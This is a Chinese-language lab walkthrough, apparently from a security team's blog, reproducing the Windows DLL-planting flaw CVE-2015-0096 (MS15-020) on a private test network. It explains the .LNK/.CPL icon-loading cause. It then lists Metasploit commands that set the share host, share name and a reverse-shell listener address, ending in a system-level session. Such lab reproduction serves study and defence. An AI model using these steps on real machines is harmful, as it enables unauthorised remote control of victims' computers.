Microsoft DLL植入远程代码执行漏洞(CVE-2015-0096) – 作者:凯信特安全团队

漏洞成因

    Microsoft Windows没有正确处理DLL文件的加载,存在远程代码执行漏洞,通过诱使用户打开远程WebDAV或SMB共享上的某些文件利用此漏洞,成功利用后可导致加载任意库。Windows使用.lnk来定义文件或者目录的快捷方式,可以使用.CPL文件来自定义图标。问题是,在Windows中,图标从模块(或者可执行文件或动态链接库)加载。事实上,.cpl文件实际上是DLL文件。因为攻击者可以定义哪些可执行模块会被加载,攻击者可以利用.LNK文件来执行任意代码。

漏洞环境

入侵主机linux:192.168.1.125

共享文件主机win7:192.168.1.102

受害者主机win7:192.168.1.109

漏洞复现

准备好两台Windows7的主机环境,搭建好一个,直接拷贝速度更快。

图片.png克隆一份Windows7:

图片.png在一台win7主机上的C盘中创建share文件夹,并进行共享。

图片.png在第二台主机上查看是否共享成功。

图片.png共享成功后,所需要的环境条件就以达成,接下来使用攻击机器kali Linux进行攻击。所使用工具为msf。

图片.png搜索相关漏洞:ms15_020

图片.png利用相关漏洞模块:

图片.png设置一个反弹shell:

图片.png查看需要设置的参数:

图片.png设置好参数,设置漏洞利用模块列表的UNCHOST和UNCSHARE

set UNCHOST 192.168.1.102

设置为文件共享主机地址

set UNCSHARE share

设置共享文件的文件夹,这里主机192.168.1.102在C盘下的share里文件夹开启了共享,提前创建好共享

set LHOST 192.168.1.125

设置漏洞成功利用后后门连接的地址

图片.pngExploit

执行漏洞

图片.png生成了几个文件,我们去生成的目录下把文件拷贝到共享主机的共享文件夹下:

图片.png可能会提示如下:图片.png

利用重命名解决问题,记得改回。

图片.png受害者访问共享后,成功了触发了漏洞。

图片.png可以发现入侵者这边弹回来了一个回话session 1

图片.png图片.png成功获取到系统权限。

来源:freebuf.com 2019-01-17 09:47:47 by: 凯信特安全团队

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论